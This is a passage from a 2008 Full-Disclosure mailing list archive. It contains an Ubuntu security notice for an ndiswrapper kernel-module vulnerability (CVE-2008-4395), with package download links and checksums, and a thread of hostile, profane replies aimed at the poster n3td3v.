And people dont think I just make up that hes a drugfuck, he even admitted
his use of illegal substances way back in 2005. So, Mr n3td3v, my question
to you is how can you be in such support of the governments security posture
on one hand, but ignore their views on drugs on the other? Do you think you
are above the governments laws and as such only need to follow what you
dictate to be applicable to you?

On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:

> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/ea030f29/attachment.html 

From hdw at kallisti.se  Fri Nov  7 00:40:24 2008
From: hdw at kallisti.se (Anders B Jansson)
Date: Fri, 07 Nov 2008 01:40:24 +0100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID: <49138E78.2030605@kallisti.se>

n3td3v wrote:
> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.

Whitehats hate you equally because you just create spam and don't post anything of actual value.

You have your mailing list.
Why can't you just stay there until you have anything of value to disclose?
-- 
// hdw



From kees at ubuntu.com  Fri Nov  7 00:47:06 2008
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 6 Nov 2008 16:47:06 -0800
Subject: [Full-disclosure] [USN-662-2] Ubuntu kernel modules vulnerability
Message-ID: <20081107004706.GW9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-662-2          November 06, 2008
linux-ubuntu-modules-2.6.22/24 vulnerability
CVE-2008-4395
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  linux-ubuntu-modules-2.6.22-15-386  2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-generic  2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-rt  2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-server  2.6.22-15.40

Ubuntu 8.04 LTS:
  linux-ubuntu-modules-2.6.24-21-386  2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-generic  2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-rt  2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-server  2.6.24-21.33

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

USN-662-1 fixed vulnerabilities in ndiswrapper in Ubuntu 8.10.
This update provides the corresponding updates for Ubuntu 8.04 and 7.10.

Original advisory details:

 Anders Kaseorg discovered that ndiswrapper did not correctly handle long
 ESSIDs.  For a system using ndiswrapper, a physically near-by attacker
 could generate specially crafted wireless network traffic and execute
 arbitrary code with root privileges. (CVE-2008-4395)


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.40.dsc
      Size/MD5:     2270 ca989ecc485630b0a895915fe537be88
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.40.tar.gz
      Size/MD5:  6969594 5a4b04bf2a8a43600440ed4dbb82b07e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.40_amd64.deb
      Size/MD5:  3014174 126dec5097ec2f638c08f4ba00d6c5af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-server_2.6.22-15.40_amd64.deb
      Size/MD5:  3013396 9f938ce9ebcad01a3d985515512f1b0c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-generic-di_2.6.22-15.40_amd64.udeb
      Size/MD5:  1048442 5e2a729f7be9dd5a34890e920094d278
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-generic-di_2.6.22-15.40_amd64.udeb
      Size/MD5:   322528 7a2a11b1d6ddcb43a901230004a1ce4e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-generic-di_2.6.22-15.40_amd64.udeb
      Size/MD5:   477900 b84c2081e9a61c22661cc5cbe794ad94
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.40_amd64.deb
      Size/MD5:  3021984 8b6a693cdeeea509dfff3475fdf20d0a
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.40_amd64.deb
      Size/MD5:  3016172 1ef53683c2d11b791c459b0650a18738

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-386_2.6.22-15.40_i386.deb
      Size/MD5:  3050174 2136265513fa9af422a122cdbe350620
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.40_i386.deb
      Size/MD5:  3059806 8bf405523841a1da181c7d1c8c58d1b0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-server_2.6.22-15.40_i386.deb
      Size/MD5:  3061220 32d626aa8b3743e4bce4523e02f04110
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-virtual_2.6.22-15.40_i386.deb
      Size/MD5:  1551884 aa5f2e7305eeea56c70bde33c9364d87
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-386-di_2.6.22-15.40_i386.udeb
      Size/MD5:  1048322 e5662e79cf6e2592ed201662b3791d1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-generic-di_2.6.22-15.40_i386.udeb
      Size/MD5:  1048446 a464b4ab787a533a221da2a665953017
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-386-di_2.6.22-15.40_i386.udeb
      Size/MD5:   322508 06f86fb69be20781c52bc86569148280
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-generic-di_2.6.22-15.40_i386.udeb
      Size/MD5:   322530 4c7da751eeb3b4b7a3ab497c63a22cd1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-386-di_2.6.22-15.40_i386.udeb
      Size/MD5:   453402 5b8ec2092189dfb41ba4af40198378ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-generic-di_2.6.22-15.40_i386.udeb
      Size/MD5:   452984 15b7497415676feb07ff84b241fba0cb
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.40_i386.deb
      Size/MD5:  3071668 43644d4577826c4e364bee854db39d30
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-ume_2.6.22-15.40_i386.deb
      Size/MD5:  3058840 08f1c87aea061d622ed48ab9dee984ef
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.40_i386.deb
      Size/MD5:  3063912 905f98a3427d0e3d818c1315c32c81d2

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-cell_2.6.22-15.40_powerpc.deb
      Size/MD5:  2620992 5dbfd308b6babddb5a1a9ecc402dbf08
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc-smp_2.6.22-15.40_powerpc.deb
      Size/MD5:  2576986 e888061406d7f470c528c57582f2826f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc64-smp_2.6.22-15.40_powerpc.deb
      Size/MD5:  2621506 c547b4ef638e351e781aec8351b530e6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc_2.6.22-15.40_powerpc.deb
      Size/MD5:  2562594 39c08d1196edadd08828bd45055f1d95
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-cell-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:  1048386 bbd5646708970a80a88edbc759b7bf74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-powerpc-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:  1048390 695c01e5fdb64300073c64105dbbb29c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:  1048572 f9dfd7ad7d30f127c30799da870cf1b1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-cell-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   322518 39d328ffb9d0f5e4b4dc0e10302d763d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   322522 ee23d211952f4229d700c2cd3be0cdf0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   322554 3799c4fd7f62931a267c8e0ffaa5e732
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-cell-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   267152 74d3981acb85811ff7309df8301fc3ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   220184 a69251f423b3bfa6cefe6ea70affd671
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.40_powerpc.udeb
      Size/MD5:   267208 c2375b4951b708ffe70ff62c893c0f72

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64-smp_2.6.22-15.40_sparc.deb
      Size/MD5:  2576774 e7385c88b1b30c755dbf9c9febbd4273
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64_2.6.22-15.40_sparc.deb
      Size/MD5:  2568952 1d71d1d5ffb24549125f1261451dbd4a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-sparc64-di_2.6.22-15.40_sparc.udeb
      Size/MD5:  1048442 26b527ec6c97b04c274363deafef8b5a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-sparc64-di_2.6.22-15.40_sparc.udeb
      Size/MD5:   322534 55ee09372717328b9e9003f19eef5f65
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-sparc64-di_2.6.22-15.40_sparc.udeb
      Size/MD5:   227022 ccc428666eaf1dbec19894b48cabfe8c

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-21.33.dsc
      Size/MD5:     2843 b065c768ca515bfdb2d914d36dba785e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-21.33.tar.gz
      Size/MD5: 12124613 2b188658339555b2f45d37fa8750c7e1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-generic_2.6.24-21.33_amd64.deb
      Size/MD5:   189460 93940fa31b3392fa28f39103a185731f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-openvz_2.6.24-21.33_amd64.deb
      Size/MD5:   189484 e80863d1642976bdf68ccb31d79db66f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-rt_2.6.24-21.33_amd64.deb
      Size/MD5:   189468 dbee17ca2851f46fdaaadcaa909b8a17
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-server_2.6.24-21.33_amd64.deb
      Size/MD5:   189464 26f99955c5e3a471b0cc9a37f42cab70
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-xen_2.6.24-21.33_amd64.deb
      Size/MD5:   189388 6ce815aea590bd94506b09ef8398c02f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-generic_2.6.24-21.33_amd64.deb
      Size/MD5:  5195826 3b3ed601f931dda28a868fb05a3ee1b1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-server_2.6.24-21.33_amd64.deb
      Size/MD5:  5194812 46b2cad00d7e9ac5bef0404cddeefc32
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-generic-di_2.6.24-21.33_amd64.udeb
      Size/MD5:  1188332 fc1f8082c93e57f7a4a6a390beaf97a2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-generic-di_2.6.24-21.33_amd64.udeb
      Size/MD5:   322536 9799720c92b8ad015e910abe000e7948
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-generic-di_2.6.24-21.33_amd64.udeb
      Size/MD5:   437672 635716de5606b1e209e574b25d01067d
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-openvz_2.6.24-21.33_amd64.deb
      Size/MD5:  5136260 dbc6d4b8cf4ffe442ce533efd21fcaee
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-rt_2.6.24-21.33_amd64.deb
      Size/MD5:  5000060 dcd473835d5cfd2829fefc1479cf1525
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-xen_2.6.24-21.33_amd64.deb
      Size/MD5:  3762436 1d9b8f41d34b6f273021bfdca1d67e52

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-386_2.6.24-21.33_i386.deb
      Size/MD5:   189454 a421774012dce569d0b2e5923a149f1a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-generic_2.6.24-21.33_i386.deb
      Size/MD5:   189448 0e000def690f20984fc4c99054be6cb0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-openvz_2.6.24-21.33_i386.deb
      Size/MD5:   189478 8d86f19beca647906b099030689261b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-rt_2.6.24-21.33_i386.deb
      Size/MD5:   189454 a30393797229804e673c9e1f121627dd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-server_2.6.24-21.33_i386.deb
      Size/MD5:   189460 d2f568fa0e7b44684f8cf8e2342211ff
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-virtual_2.6.24-21.33_i386.deb
      Size/MD5:   189370 d85d8fc4f2e6f9570946ff8bfd970b2d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-xen_2.6.24-21.33_i386.deb
      Size/MD5:   189378 794f36ae3ad07032701f9158c6fb6e5f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-386_2.6.24-21.33_i386.deb
      Size/MD5:  5410928 58a7c88e6c0cbbd8fbaaacd3ea7f1c52
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-generic_2.6.24-21.33_i386.deb
      Size/MD5:  5432772 4edc21627f5a1d4d64d41600c1b77158
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-server_2.6.24-21.33_i386.deb
      Size/MD5:  5436006 4214f38956c517f22e6c3b93d5a58c93
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-virtual_2.6.24-21.33_i386.deb
      Size/MD5:  2330378 d2b45b229874e96c991b0f6efd96dd10
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-386-di_2.6.24-21.33_i386.udeb
      Size/MD5:  1188218 2ca8e01af3a10b057daa58883f369437
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-generic-di_2.6.24-21.33_i386.udeb
      Size/MD5:  1188340 08577229d57dc03599ab572d94c46d10
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-386-di_2.6.24-21.33_i386.udeb
      Size/MD5:   322508 56e320c57c477fed8334c551c815654e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-generic-di_2.6.24-21.33_i386.udeb
      Size/MD5:   322530 1befde4ad9771b07c84a1cd06ef92d87
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-386-di_2.6.24-21.33_i386.udeb
      Size/MD5:   431114 52610fb889bff54b3bb9742d788fc8ea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-generic-di_2.6.24-21.33_i386.udeb
      Size/MD5:   432372 afcb9123331f18b4925ef2f3dc429d7c
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-openvz_2.6.24-21.33_i386.deb
      Size/MD5:  5369676 30ff5548028d72b98deb01fc635130d8
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-rt_2.6.24-21.33_i386.deb
      Size/MD5:  5246852 9c3d18bb457a3e6eeae6d6f402c02019
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-xen_2.6.24-21.33_i386.deb
      Size/MD5:  3807492 4331c23fddd120ec6f99b3de6a689032

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-lpia_2.6.24-21.33_lpia.deb
      Size/MD5:   189376 bd60338461a627ff950828ea23777970
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-lpiacompat_2.6.24-21.33_lpia.deb
      Size/MD5:   189376 f0762d38b9e4e6f14c8de4ac5f857440
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-lpia_2.6.24-21.33_lpia.deb
      Size/MD5:  3651028 22d5934897c79104bedd989927cb6247
    http://ports.ubuntu.com/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-lpiacompat_2.6.24-21.33_lpia.deb
      Size/MD5:  3509066 59698feb1097012e947ec98129e2f577

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-powerpc-smp_2.6.24-21.33_powerpc.deb
      Size/MD5:   189390 0614f04aae4d3c3466869878114b2c6d
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-powerpc64-smp_2.6.24-21.33_powerpc.deb
      Size/MD5:   189410 65614ba5e3fd7944a0c77e46bdea244c
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-powerpc_2.6.24-21.33_powerpc.deb
      Size/MD5:   189384 b64b1d0ed48bc32e8f48ded17215a28a
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-powerpc-smp_2.6.24-21.33_powerpc.deb
      Size/MD5:  3351040 bc219c46833a0170c800cf1a88eaa09e
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-powerpc64-smp_2.6.24-21.33_powerpc.deb
      Size/MD5:  3300432 5a5bc4ec616c04ceb4303025273f4dd8
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-powerpc_2.6.24-21.33_powerpc.deb
      Size/MD5:  3335126 56e670bf8ee3869e27b9a56e9fa4e4be
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-powerpc-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:  1188302 dc16d94232f4183e26f5820f9a657747
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-powerpc64-smp-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:  1188484 705b76a5a7d1fe3007d8754f1c158ab9
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-powerpc-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:   322522 4a5f2dfff53d6e59dbb0074680417eb6
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-powerpc64-smp-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:   322550 6b0f7b384b09e144c9d7297e839f1860
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-powerpc-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:   329500 b3c6943dc8eb7642f47ad63635f95aea
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-powerpc64-smp-di_2.6.24-21.33_powerpc.udeb
      Size/MD5:   391698 fed5f67b33378a75f0a8cde2db8899b6

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-sparc64-smp_2.6.24-21.33_sparc.deb
      Size/MD5:   189392 e029872f1d715c863908a38408906183
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-21-sparc64_2.6.24-21.33_sparc.deb
      Size/MD5:   189380 3ba0efa186950fc60a1dc3de2e362397
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-sparc64-smp_2.6.24-21.33_sparc.deb
      Size/MD5:  3185356 02fb1e9baddc9c792ef3e5fd656f44f4
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-sparc64_2.6.24-21.33_sparc.deb
      Size/MD5:  3177534 08388b20245303eb8bfbbde476afa963
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb
      Size/MD5:  1188332 1379b3944196d181d959d61ad4cb39be
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb
      Size/MD5:   322528 b559b12e3cbded7d88a0745e3811e8de
    http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb
      Size/MD5:   362988 e350d0a226b6e1c74f34bf5d59c98b94

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 235 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/a9e511ff/attachment.bin 

From xploitable at gmail.com  Fri Nov  7 01:06:47 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 01:06:47 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
Message-ID: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>

i've been monitoring the scene since 1999 so what do you mean no
experience? i make that about 10 years experience if my math is
correct.

On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> Do you even understand why people dont like you? It is because you have all
> these crackpot ideas but no experience to back it up. All your ideas only
> make sense from a theoretical standpoint, but in practicality most will
> fail.
>
> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
>>
>> blackhats like you will always hate on me, so i just ignore the
>> negative responses i get.
>



From waveroad at gmail.com  Fri Nov  7 01:20:17 2008
From: waveroad at gmail.com (waveroad waveroad)
Date: Thu, 6 Nov 2008 20:20:17 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
Message-ID: <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>

You can be ""monitoring"" the scene since 20 years if you want to, it's not
for that your point will be valuable.
And actually it is not, also this is about logic.

See you're wrong again.

Get the fuck out of here.








2008/11/6, n3td3v <xploitable at gmail.com>:
>
> i've been monitoring the scene since 1999 so what do you mean no
> experience? i make that about 10 years experience if my math is
> correct.
>
>
> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> > Do you even understand why people dont like you? It is because you have
> all
> > these crackpot ideas but no experience to back it up. All your ideas only
> > make sense from a theoretical standpoint, but in practicality most will
> > fail.
> >
>
> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
> >>
> >> blackhats like you will always hate on me, so i just ignore the
> >> negative responses i get.
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
